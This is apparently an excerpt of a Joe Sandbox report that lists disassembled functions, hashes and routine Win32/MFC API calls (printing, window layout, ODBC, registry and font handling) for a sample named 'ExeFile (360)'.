Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
API String ID: 1105401458-111014456
Opcode ID: 0ad15f7f3193e04d3c50f22303a0cd09b19078e092322bfa748154e87edf64c0
Instruction ID: 152c128a13e506251cfa63a3db012c097fa5f41df61ba201582c059cb9713a48
Opcode Fuzzy Hash: 0ad15f7f3193e04d3c50f22303a0cd09b19078e092322bfa748154e87edf64c0
Instruction Fuzzy Hash: 7A01B12574430669D210A364FC06FA73B88DB85B44F540076F580D21A7FBF894888BEF

Function 0044F507 Relevance: 21.5, APIs: 14, Instructions: 480COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044F50C

Part of subcall function 0044FC28: __EH_prolog.LIBCMT ref: 0044FC2D

Part of subcall function 0043076E: GetMessageTime.USER32 ref: 00430780
Part of subcall function 0043076E: GetMessagePos.USER32 ref: 00430789

CreateDCA.GDI32(?,?,?,00000000), ref: 0044F55E
SetAbortProc.GDI32(?,Function_0004F383), ref: 0044F825
UpdateWindow.USER32(?), ref: 0044F8C4
StartDocA.GDI32(?,?), ref: 0044F8D9
EndDoc.GDI32(?), ref: 0044FAC3

Part of subcall function 0043C68F: __EH_prolog.LIBCMT ref: 0043C694

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: dddbd2696fdaadd97b79cf2ec977651d8d354996e7486a505845389b0e0f90a4
Instruction ID: 199425f32682ab644a7ba1653f57f8b44e8501a412eef59a8fdc26a4ea77dab0
Opcode Fuzzy Hash: dddbd2696fdaadd97b79cf2ec977651d8d354996e7486a505845389b0e0f90a4
Instruction Fuzzy Hash: 7C127D70D00219EFDF14EFA4D995AEDBBB4BF18308F5040AEE515A3292DB785E48CB25

Function 0043B8BB Relevance: 21.4, APIs: 14, Instructions: 390COMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 0043B8EC
GetClientRect.USER32(?,?), ref: 0043B911
BeginDeferWindowPos.USER32(?), ref: 0043B941
GetWindowRect.USER32(?,?), ref: 0043BA06
OffsetRect.USER32(?,?,00000000), ref: 0043BA38
OffsetRect.USER32(?,?,00000000), ref: 0043BA6E
OffsetRect.USER32(?,00000002,00000000), ref: 0043BA90
EqualRect.USER32(?,?), ref: 0043BAC5
OffsetRect.USER32(?,00000000,?), ref: 0043BB3F
OffsetRect.USER32(?,00000000,?), ref: 0043BB73
OffsetRect.USER32(?,00000000,?), ref: 0043BB99
EqualRect.USER32(?,?), ref: 0043BBA7
EndDeferWindowPos.USER32(?), ref: 0043BCEC
SetRectEmpty.USER32(?), ref: 0043BCF6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 3adf0876d57035e1861184d0505de6622793fd9e02e25c087930ec5bf1f130ce
Instruction ID: 674263ef98f1d8fc462c92045060d4e730528e2c4b37e4d9dcf9ed97af9dbcc0
Opcode Fuzzy Hash: 3adf0876d57035e1861184d0505de6622793fd9e02e25c087930ec5bf1f130ce
Instruction Fuzzy Hash: 8CF1F771E0060ADFCF14CFA8D985AAEB7B5FF08301F10952AE516E7215DB78A941CB98

Function 0044D883 Relevance: 21.4, APIs: 14, Instructions: 385stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044D888
lstrlenA.KERNEL32(?,?,00000000), ref: 0044D8B9
VariantClear.OLEAUT32(?), ref: 0044DB5C
VariantClear.OLEAUT32(?), ref: 0044DB83
SysFreeString.OLEAUT32(00000000), ref: 0044DBE7
SysFreeString.OLEAUT32(?), ref: 0044DBFC
SysFreeString.OLEAUT32(?), ref: 0044DC11
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0044DC4C
VariantClear.OLEAUT32(?), ref: 0044DC5C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
String ID:
API String ID: 344392101-0
Opcode ID: fed17701bd21262d0d3dc9f73c596c94056e0020694c42b109647f2bc5ee14cd
Instruction ID: 6d89e715ed6be22bc454eb66073585baf0276e4e3cfc56c54ce675019c921e9c
Opcode Fuzzy Hash: fed17701bd21262d0d3dc9f73c596c94056e0020694c42b109647f2bc5ee14cd
Instruction Fuzzy Hash: C7E19F71D0020ADFEF10DFA8DC80AAEBBB4FF45315F14402AE911AB291D778A951CF69

Function 00437ADC Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168stringlibraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00437AE1

Part of subcall function 0042EFC8: InterlockedIncrement.KERNEL32(?), ref: 0042EFDD

Part of subcall function 00435247: CloseHandle.KERNEL32(00000001,00000000,?,00434F9E,?,?,004434BC,?,?,?,00412E68,00000004,00000000), ref: 00435256
Part of subcall function 00435247: GetLastError.KERNEL32(00000000,00434F9E,?,?,004434BC,?,?,?,00412E68,00000004,00000000), ref: 0043527B

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00437B34
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00437B40

Part of subcall function 00437876: __EH_prolog.LIBCMT ref: 0043787B
Part of subcall function 00437876: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 004378AE
Part of subcall function 00437876: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 004378D4

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

lstrlenA.KERNEL32(?,00000000), ref: 00437B91
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00437BB4
lstrlenA.KERNEL32(?,?,00000001), ref: 00437BD3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00437BF6
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00437C14
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00437C34
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00437C4F

Strings

ReplaceFile, xrefs: 00437B3A
KERNEL32, xrefs: 00437B2F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 4bfa837a4462939e8ee399bc060ee8f43c8df7bc762b74860365f2eee3173883
Instruction ID: fe2beead91103997aab0ad8e6007cd977e548e51573677f03f240bd8e8f2cf4a
Opcode Fuzzy Hash: 4bfa837a4462939e8ee399bc060ee8f43c8df7bc762b74860365f2eee3173883
Instruction Fuzzy Hash: D9518FB1D00219AFCB20EFA5CD859AEBBB8FF09354F10152AE851B3251D7789E44CB69

Function 00401460 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0040148B
#24.ODBC32(00000003,?,?,SELECT * FROM Connection), ref: 004014DC
#11.ODBC32(?,00000000,000000FD,00000000,00000003,?,?,SELECT * FROM Connection), ref: 004014FC
#4.ODBC32(?,00000001,00000004,?,00000000,?,?,00000000,000000FD,00000000,00000003,?,?,SELECT * FROM Connection), ref: 0040151F
#4.ODBC32(?,00000002,00000001,?,000000FF,?,?,00000001,00000004,?,00000000,?,?,00000000,000000FD,00000000), ref: 00401546
#4.ODBC32(?,00000003,0000000B,?,00000010,?,?,00000002,00000001,?,000000FF,?,?,00000001,00000004,?), ref: 00401568
#4.ODBC32(?,00000004,00000004,?,00000000,?,?,00000003,0000000B,?,00000010,?,?,00000002,00000001,?), ref: 00401585
#13.ODBC32(?,?,00000004,00000004,?,00000000,?,?,00000003,0000000B,?,00000010,?,?,00000002,00000001), ref: 00401599
SendMessageA.USER32(?,?,?,?), ref: 004015C3
#16.ODBC32(?,00000002,00000003,?,?,SELECT * FROM Connection), ref: 004015FD
#31.ODBC32(00000003,?,?,00000002,00000003,?,?,SELECT * FROM Connection), ref: 0040160C

Strings

SELECT * FROM Connection, xrefs: 0040149B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSendWindow
String ID: SELECT * FROM Connection
API String ID: 701072176-143602750
Opcode ID: c6d1d6b0d327817ffa7b4a17b369599444f62c4105faabb5a85ab8b460db84d9
Instruction ID: 14746d0afbb8e6a7e82c8132b1e13bbdad4ffceff8eda1041d95ea89e0f05ffc
Opcode Fuzzy Hash: c6d1d6b0d327817ffa7b4a17b369599444f62c4105faabb5a85ab8b460db84d9
Instruction Fuzzy Hash: 9151B5B5A0024AABDF10DB94CD81FFF7778EB88704F50452AB605B72D0DA789E41C764

Function 004437E2 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004437E7

Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5A6
Part of subcall function 0044B56B: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5B8
Part of subcall function 0044B56B: LeaveCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5C1
Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A), ref: 0044B5D3

LoadBitmapA.USER32(?,00007912), ref: 0044381E
GetObjectA.GDI32(00000000,00000018,?), ref: 00443830
GetSystemMetrics.USER32(0000002A), ref: 0044387A
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00443894
CreateFontIndirectA.GDI32(?), ref: 004438B4
SelectObject.GDI32(?,00000000), ref: 004438E4
GetTextMetricsA.GDI32(?,?), ref: 004438F6
SelectObject.GDI32(?,00000000), ref: 00443907

Strings

, xrefs: 004438AC
Terminal, xrefs: 00443884
Small Fonts, xrefs: 0044388B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: ed69fe091631290c947c859caf54ab1f9ea830b1ae84af2c92739b547eecc0cb
Instruction ID: 326d798f3ab759498eebb619bcbcb2b668450c756cf23e2ab5232518c293e3bf
Opcode Fuzzy Hash: ed69fe091631290c947c859caf54ab1f9ea830b1ae84af2c92739b547eecc0cb
Instruction Fuzzy Hash: 65418471D00309AFEB10EFA5DC45AAEBBB8FB44706F10013AF505E7251E7B89A45CB69

Function 004280A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 004280B9
GetPropA.USER32(?,00000000), ref: 004280CD
GetPropA.USER32(?,00000000), ref: 004280E1
GetPropA.USER32(?,00000000), ref: 004280F5
GetPropA.USER32(?,00000000), ref: 00428109
GetPropA.USER32(?,00000000), ref: 00428119
IsWindowUnicode.USER32(?), ref: 00428136
GetClassNameA.USER32(?,?,00000010), ref: 00428148
lstrcmpiA.KERNEL32(?,edit), ref: 00428158
SetWindowLongA.USER32(?,000000FC,?), ref: 00428168
SetPropA.USER32(?,00000000,00000000), ref: 00428179

Strings

edit, xrefs: 00428152

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: ce47cccd65b828559f573fdd02315eca174eed0392ba9605590fb6f4a23b59f7
Instruction ID: a2d7c8d61795dee10d4c0bb89501d4341537436b60c1e4137995a5a8c10ea225
Opcode Fuzzy Hash: ce47cccd65b828559f573fdd02315eca174eed0392ba9605590fb6f4a23b59f7
Instruction Fuzzy Hash: 5F21DE6A302622BEA741A738BC04EBF329C9F586447400079FC58C2161FB69CA478B7E

Function 00439D5C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 00439D90
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 00439DD3
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 00439E00
RegCloseKey.ADVAPI32(?), ref: 00439E24
FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00439E4D
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00439E6D
SystemParametersInfoA.USER32(00000068,00000000,0046D63C,00000000), ref: 00439E8B

Strings

WheelScrollLines, xrefs: 00439DF8
MouseZ, xrefs: 00439E48
Control Panel\Desktop, xrefs: 00439DC9
MSH_SCROLL_LINES_MSG, xrefs: 00439D8B
Magellan MSWHEEL, xrefs: 00439E43

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: a54ea89dbe85e66509dd1c563173a1e2618a1f48d72d3b66813440b5ddc40fd3
Instruction ID: 6e6c03a0558f629d47b79a3df1eaeb3571beb0b1f1a7a01c0d3e526e88acd094
Opcode Fuzzy Hash: a54ea89dbe85e66509dd1c563173a1e2618a1f48d72d3b66813440b5ddc40fd3
Instruction Fuzzy Hash: 4921C370E01224AADB20DF10DC4AAAB3B78EB04711F115036F449D21A1F7F85D84CB9F

Function 0044753C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

lstrcpyA.KERNEL32(00000000,00000000), ref: 00447570
lstrlenA.KERNEL32(00000000,:%d,?), ref: 0044758A
wsprintfA.USER32 ref: 00447598
lstrcatA.KERNEL32(00000000, - ), ref: 004475AD
lstrcatA.KERNEL32(00000000,?), ref: 004475BC
lstrcpyA.KERNEL32(?,?), ref: 004475CD
lstrcatA.KERNEL32(?, - ), ref: 004475EB
lstrcatA.KERNEL32(?,00000000), ref: 004475F7
lstrlenA.KERNEL32(?,:%d,?), ref: 0044760D
wsprintfA.USER32 ref: 0044761B

Strings

:%d, xrefs: 00447584, 00447607
- , xrefs: 004475A7, 004475E5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: 213b82538a91794d20db84116ef859782a2367ec084fb19d34369ca5a4d460cb
Instruction ID: d353d4f2ed6847ce7b9cccea646e38a7a9ba0ee3fef9c4b3fd4ef6b2185f0cb1
Opcode Fuzzy Hash: 213b82538a91794d20db84116ef859782a2367ec084fb19d34369ca5a4d460cb
Instruction Fuzzy Hash: 4D2160B190471AAFDF20AB64DD4CF9A7BBCAB04305F1084B6FA19D2152D378DA49CF94

Function 004504EA Relevance: 19.6, APIs: 13, Instructions: 134COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00450526
GetTextFaceA.GDI32(00000000,00000020,?), ref: 00450535
GetTextMetricsA.GDI32(00000000,?), ref: 0045054B
CreateFontIndirectA.GDI32(?), ref: 0045059B
SelectObject.GDI32(00000000,00000000), ref: 004505A4
GetTextMetricsA.GDI32(00000000,?), ref: 004505B4
GetWindowExtEx.GDI32(00000000,00000000), ref: 004505D9
GetViewportExtEx.GDI32(00000000,?), ref: 004505E6
MulDiv.KERNEL32(?,00000000,00000000), ref: 00450615
MulDiv.KERNEL32(?,00000000,00000000), ref: 00450623
CreateFontIndirectA.GDI32(?), ref: 00450643

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 8e442e19aa0725dfb378c98cb6823ff36a0c11070371b40f761d25fc0297c39e
Instruction ID: 23db50435dda8cd3d46fa23b37aec01b31b8617c654a5e50873ff9de9bc2f9b3
Opcode Fuzzy Hash: 8e442e19aa0725dfb378c98cb6823ff36a0c11070371b40f761d25fc0297c39e
Instruction Fuzzy Hash: 5D514775800649EFDF21DFE4C954AAEBFB4EF04305F10406AE855A7252D7349A46DF14

Function 0042B500 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 0042B514
GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 0042B520
EnterCriticalSection.KERNEL32(0046F280), ref: 0042B53C
GetVersion.KERNEL32 ref: 0042B54E
GetSystemMetrics.USER32(00000007), ref: 0042B592
GetSystemMetrics.USER32(00000008), ref: 0042B59C
GetSystemMetrics.USER32(00000004), ref: 0042B5A6
GetSystemMetrics.USER32(0000001E), ref: 0042B5AF
LeaveCriticalSection.KERNEL32(0046F280), ref: 0042B5BB

Strings

KERNEL32.DLL, xrefs: 0042B50F
DisableThreadLibraryCalls, xrefs: 0042B51A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
String ID: DisableThreadLibraryCalls$KERNEL32.DLL
API String ID: 1414939872-3863293605
Opcode ID: 645d301ddfdb6802ed737b189f24e659f659ff96a34c5e1890b8084d730503f6
Instruction ID: 5536246645db548f4848010a02385423d9f1d5b25e540493cb1005109d097d3c
Opcode Fuzzy Hash: 645d301ddfdb6802ed737b189f24e659f659ff96a34c5e1890b8084d730503f6
Instruction Fuzzy Hash: 171177B4950715AAD710AB60BC2965A3B60FF00755F40447BE8859B261F7B99488CF8F

Function 00443BCB Relevance: 18.3, APIs: 12, Instructions: 288keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetWindowRect.USER32(?,?), ref: 00443BE8
GetSystemMetrics.USER32(00000021), ref: 00443BF6
GetSystemMetrics.USER32(00000020), ref: 00443BFF
GetKeyState.USER32(00000002), ref: 00443C34
InflateRect.USER32(?,?,00000000), ref: 00443C6C
PtInRect.USER32(?,?,?), ref: 00443CF0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 6f86c0fd183397ae3b52fb961574c02667b247dc18e99f4c93f18d68927c34a2
Instruction ID: 7fb80786dd05207d623bd23396111117c67bda02153fe58c1ccabef86ebe7763
Opcode Fuzzy Hash: 6f86c0fd183397ae3b52fb961574c02667b247dc18e99f4c93f18d68927c34a2
Instruction Fuzzy Hash: 01A19832E00219ABEF14DFA8C885BEE77B5EF48B56F14802BD806E7241D6789B41CB54

Function 004494BA Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 66stringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32(00000000,004592AC,?,?,?,?,004494A4,00000000), ref: 004494D0
